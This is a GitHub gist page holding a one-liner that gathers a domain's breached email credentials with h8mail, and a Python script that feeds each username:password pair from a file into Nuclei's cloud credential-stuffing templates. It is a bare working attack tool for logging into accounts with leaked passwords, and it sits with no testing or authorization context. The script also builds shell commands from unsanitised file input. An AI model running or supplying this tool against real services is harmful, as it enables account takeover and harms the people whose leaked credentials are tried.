Skip to content

Instantly share code, notes, and snippets.

@nullenc0de
Created September 24, 2023 13:18
Show Gist options
  • Star 3 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save nullenc0de/b6bb7623faeebb9d4eacf8b6f12124be to your computer and use it in GitHub Desktop.
Save nullenc0de/b6bb7623faeebb9d4eacf8b6f12124be to your computer and use it in GitHub Desktop.
h8mail -t "$1" -q domain -c ./h8mail_config.ini --skip -o /tmp/"$1".h8mail.csv && cat /tmp/"$1".h8mail.csv |grep "$1": |cut -d "-" -f2|tr -d ' ' |grep "$1" |sort -u
import subprocess
import argparse
# Define the command to run Nuclei
nuclei_command = "nuclei -silent -t credential-stuffing/cloud -var username={} -var password={}"
# Create a command-line argument parser
parser = argparse.ArgumentParser(description='Credential Stuffing Scanner')
# Add an argument for specifying the creds.txt file
parser.add_argument('creds_file', help='Path to the creds.txt file')
# Parse the command-line arguments
args = parser.parse_args()
# Read and process the credentials from the specified file
with open(args.creds_file, 'r') as file:
for line in file:
parts = line.strip().split(':')
if len(parts) == 2:
username = parts[0]
password = parts[1]
# Execute Nuclei command with extracted credentials
subprocess.run(nuclei_command.format(username, password), shell=True)
print("Credential stuffing scan completed.")
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment